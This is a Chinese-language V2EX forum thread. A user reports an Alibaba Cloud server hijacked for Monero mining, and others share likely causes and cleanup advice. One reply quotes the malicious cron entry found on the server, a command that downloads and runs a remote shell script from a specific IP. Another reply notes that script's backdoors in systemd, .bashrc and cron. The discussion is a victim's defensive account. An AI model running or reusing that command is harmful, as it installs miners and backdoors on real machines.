V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
bigxianyu
V2EX  ›  服务器

太可怕了,第一次碰到,阿里云服务器被人侵入用来挖矿了。。。。

  •  
  •   bigxianyu · 162 天前 · 3571 次点击
    这是一个创建于 162 天前的主题,其中的信息可能已经有所发展或是发生改变。

    logroate 进程在狂刷 cpu , 不知道是什么侵入的( 这是最可怕的) ,太可恶了,可怕。。。。

    22 条回复    2024-06-27 09:21:20 +08:00
    bigxianyu
        1
    bigxianyu  
    OP
       162 天前
    然后阿里云告诉我说,你当前账号用的是免费版云安全中心,不支持病毒查杀。。。。
    Canglin
        2
    Canglin  
       162 天前
    不过可以看是哪些进程,kill 掉后删除就好了,我也被弄过
    Foxkeh
        3
    Foxkeh  
       162 天前
    只能检查下 SSH 和各种暴露到公网的弱密码, 安全组, 不明来源的软件或被爆出漏洞的第三方 Web 应用(尤其是用 root 权限运行的)

    然后建议重装
    tinyfry
        4
    tinyfry  
       162 天前
    果断重装,不要开放一些不用的端口,密码强度要设置高一些,定期对组件进行升级。
    bigxianyu
        5
    bigxianyu  
    OP
       162 天前
    @daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) , 这是 cron 任务里被添加的东西
    bigxianyu
        6
    bigxianyu  
    OP
       162 天前
    @Canglin 嗯,已经手动弄了,搜到了以前也有人被搞过
    idragonet
        7
    idragonet  
       162 天前
    系统重新安装肯定的,SSH 只开启证书登录。
    bigxianyu
        8
    bigxianyu  
    OP
       162 天前
    @bigxianyu 问下大佬们,IP 有举报功能吗 , 感觉可以有这个功能,
    bigxianyu
        9
    bigxianyu  
    OP
       162 天前
    @bigxianyu 我要举报这个 ip ,找到对应的
    @bigxianyu 185.196.8.123 我要举报这个 IP , 感觉有点神奇,好像这个 IP 发生过好久了,我在 google 搜索都搜到了好几篇文章
    bigxianyu
        10
    bigxianyu  
    OP
       161 天前
    @bigxianyu 类似骚扰电话功能
    virusdefender
        11
    virusdefender  
       161 天前   ❤️ 1
    据我经验,50% 是 ssh 弱口令,30% 是 redis 弱口令,20% 是各种其他漏洞。
    Canglin
        12
    Canglin  
       161 天前
    @bigxianyu #6 你是不是用过那种公共的 docker 镜像啊?我之前弄过一个 Oracle 和 MySql ,就被挖矿了
    1423
        13
    1423  
       161 天前   ❤️ 6
    就是因为你们这种人,国产服务和 APP 才肆无忌惮的以安全保护的名义查用户的数据
    Pierro
        14
    Pierro  
       161 天前
    之前用 docker 远程部署镜像 端口有漏洞就被挖矿了 各种查定时文件什么的 清了还是会自动执行 就直接重装了
    oneisall8955
        15
    oneisall8955  
       161 天前
    http://185.196.8.123/logservice.sh 这个文件做了好几个后门,systemd ,.bashrc ,cron ,都检查下
    bigxianyu
        16
    bigxianyu  
    OP
       161 天前 via Android
    @oneisall8955 嗯嗯,是这三个
    akira
        17
    akira  
       161 天前
    服务器直接作废 重新开一台吧,然后好好做好安全
    Gilfoyle26
        18
    Gilfoyle26  
       161 天前
    阿里云这个回复,是真的让人心寒。
    JiunnTarn
        19
    JiunnTarn  
       161 天前
    @Pierro #14 前天刚经历,一模一样😭
    ynkcc
        20
    ynkcc  
       155 天前 via Android
    lazyrm
        21
    lazyrm  
       139 天前 via iPhone
    我上次是因为开启了 jdk 的远程调试
    yier4ha
        22
    yier4ha  
       136 天前
    xmr 门罗币挖矿 我都遇到好多次了。清除了 没用。然后把脚本里面的文件权限改了也不行。会检测 xmrig 没有执行权限他会自动授权。我感觉那次不是 ssh 弱口令问题,我改了好几次密码都会回来,而且重启路由改变了 IP 没过多久还是会进来,可能是某个看起来正常的我还在用的服务有问题。最后重装系统才搞定。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2626 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 03:20 · PVG 11:20 · LAX 19:20 · JFK 22:20
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.